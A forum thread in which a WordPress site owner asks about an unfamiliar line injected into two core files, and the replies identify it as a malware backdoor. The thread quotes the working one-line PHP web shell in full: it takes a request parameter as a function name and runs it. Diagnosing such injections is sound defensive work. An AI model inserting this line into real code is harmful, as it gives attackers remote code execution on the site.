Any help is very appreciated.
Short story:
I would like some help trying to understand what this line of code is intended to do.
extract($_REQUEST)&&@$shall(stripslashes($shall))&&exit;
I deciphered most of it except the $shall part. $shall does not appear anywhere else and I did not go into details of reading WordPress code.
The line appeared in the below files as the first line right after <?php
Long story:
I have a site that runs on WordPress and it randomly broke with errors in 2 WordPress files. The filenames are
…/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php
…/wp-includes/blocks/block.php
It is not present in WordPress GitLab file versions. We did not initiate any WordPress updates, etc. I commented out the line in both files and all is back to normal.
Any ideas as to how/why/for what purpose this line would appear there?
2
Answers
If
($_REQUEST['shall']="something")then$shallwill equal string'something'after theextractpart. If there’s a function calledsomethingit will execute. So basically all wordpress functions are available for this script. This is a back door for a malware no doubt. Not good.Search in google found record of the file name somewhere, however before you remove it be ready for it to re-appear if you haven’t fixed your vulnerabilities.
This is a malware and remove the code part from the file. Then it works for me